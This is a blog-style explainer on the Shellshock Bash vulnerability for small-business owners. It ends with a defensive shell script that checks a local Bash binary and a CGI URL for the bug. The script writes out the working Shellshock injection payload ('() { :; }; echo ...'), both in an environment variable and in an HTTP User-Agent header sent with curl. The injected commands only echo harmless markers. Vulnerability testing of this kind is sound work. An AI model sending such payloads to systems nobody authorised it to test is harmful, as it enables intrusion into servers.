The Internet is abuzz with trepidation about a new bug in software systems, and with good reason. Shellshock is the name given to a bug in Bash, the shell program found on most Unix-like systems, and it is serious enough to make cyber security experts shiver. Some predict that this ‘Bash Bug’ could have more crippling consequences than the Heartbleed bug that reared its head in April. Shellshock is as serious a menace as security bugs get, and the full range of affected systems is not yet known. The story is still in its earliest stages, but here is a brief rundown of the bug in layman’s terms (follow the links for more comprehensive info).
In simple terms, Shellshock is a vulnerability in Bash. Bash is the default command-line shell on most Linux distributions and on Mac OS X, and it runs on millions of machines, so the scope of possible attacks is immense. Bash has been around for about 25 years, and every release up to the ones patched this week carries the bug. Because web servers often hand data from incoming requests to Bash (for example through CGI scripts), an attacker can use Shellshock to execute arbitrary commands on those servers, and web servers are where many small businesses host their websites along with other cloud-based Internet services.
The Heartbleed bug was thought to be pretty bad – and Shellshock wasn’t even around a few months ago. A Mashable article explains: “Unlike Heartbleed, which forced users to change their passwords for various Internet services, Shellshock doesn’t appear to have any easy solutions for average users right now. In most cases, it will be up to system administrators and software companies to issue patches.”
Shellshock lets an attacker smuggle commands into data that a program only meant to pass along. The flaw is in how Bash handles environment variables: a variable whose value looks like a function definition is imported as a function when Bash starts, and vulnerable versions also run whatever commands are appended after that definition. Anything that lets an attacker set an environment variable and then launches Bash, such as a web server copying HTTP headers into the environment of a CGI script, thus becomes a path to running commands on the system, putting it at risk of compromise and of having its data revealed. A first patch for Linux-based systems was issued, but it was found to be incomplete, and follow-up patches are being developed to fully protect against the bug.
To conclude, this means that your business could be at risk. It’s still too early for outright panic, and security experts (a.k.a. the good guys) are working to close the hole and keep the hackers (the bad guys) out. For now, your main concern is how to protect your website or network from data theft, malware infections, and full network shutdowns. If your site is hosted by an outside company, check with your host to find out how they are responding to the Bash Bug. If you run your own Linux or Mac OS X servers, install the Bash updates from your vendor as they are released: this bug is fixed by patching Bash, not by antivirus software (which you should of course keep up to date anyway). Do not let your guard down and assume that Shellshock won’t get you.
It’s also a good idea to test your own exposure. Several web-based tools will probe a Linux-hosted site and report whether it responds to the Shellshock payload; enter your site’s details and they will tell you if you appear to be at risk. Keep in mind that such tools only exercise the web-facing path, so check Bash on the server itself as well. In any case, leaving “well enough alone” isn’t an option: once you know there’s a risk, best practice is to mitigate it and prepare for the next thing hackers will likely launch.
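The following script is an added example, not code from the original post or from any of the tools it links to. It runs the widely circulated local probe for the original Shellshock bug (CVE-2014-6271) against a Bash binary, and it shows how the same payload travels into a CGI script over HTTP, which is what the web-based checkers mentioned above do. It assumes a `bash` binary on your PATH (or a path passed as the first argument), the standard `env` utility, and `curl` for the optional web probe; the `cgi_probe` URL is a placeholder you supply. It only detects the first bug, not the incomplete-patch follow-up, so a “patched” result here is not proof that the later fixes are installed.

```shell
#!/bin/sh
# Added example (not from the original article): local Shellshock check.
# Assumptions: "bash" is on PATH (or a path is passed as $1), "env" exists,
# and "curl" is available if you use cgi_probe.

# classify_probe_output OUTPUT
# Pure helper: given what the probe printed, decide the verdict.
classify_probe_output() {
  case "$1" in
    *VULN*) echo "vulnerable" ;;
    *)      echo "patched" ;;
  esac
}

# shellshock_check [BASH]
# Runs the canonical CVE-2014-6271 probe against the given bash binary.
# Prints "vulnerable", "patched" or "no-bash"; exit status 1, 0 or 2.
shellshock_check() {
  bash_bin="${1:-bash}"
  if ! command -v "$bash_bin" >/dev/null 2>&1; then
    echo "no-bash"
    return 2
  fi
  # The environment variable holds a function definition ("() { :; }")
  # followed by a trailing command ("echo VULN"). A vulnerable bash runs
  # that trailing command while importing the function at startup, before
  # it even reaches the -c script. A patched bash treats the whole value
  # as an ordinary string and prints only "probe".
  out=$(env x='() { :; }; echo VULN' "$bash_bin" -c 'echo probe' 2>/dev/null)
  verdict=$(classify_probe_output "$out")
  echo "$verdict"
  [ "$verdict" = "patched" ]
}

# cgi_probe URL
# The same payload over HTTP: a CGI-enabled web server copies the User-Agent
# header into the HTTP_USER_AGENT environment variable before starting the
# script, so a bash-based CGI script imports it exactly like the local probe.
# The injected commands emit a minimal CGI header block and a marker body.
# Only run this against hosts you own or are authorised to test.
cgi_probe() {
  command -v curl >/dev/null 2>&1 || { echo "curl not found" >&2; return 2; }
  payload='() { :; }; echo "Content-Type: text/plain"; echo; echo "SHELLSHOCK-VULN"'
  if curl -s -A "$payload" "$1" | grep -q 'SHELLSHOCK-VULN'; then
    echo "vulnerable"
    return 1
  fi
  echo "not detected"
}

# Usage: SHELLSHOCK_RUN=1 sh shellshock_check.sh [/path/to/bash]
# The guard keeps the functions source-able without running the check.
if [ "${SHELLSHOCK_RUN:-0}" = 1 ]; then
  shellshock_check "$@"
fi
```

Run it on each Linux or OS X box you administer, not just on the web server; any program that launches Bash with attacker-influenced environment variables (DHCP clients, SSH forced commands, cron jobs fed external data) is exposed the same way, and a “not detected” from the web probe only means that one URL did not echo the marker back.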
Photo credit: ZDNet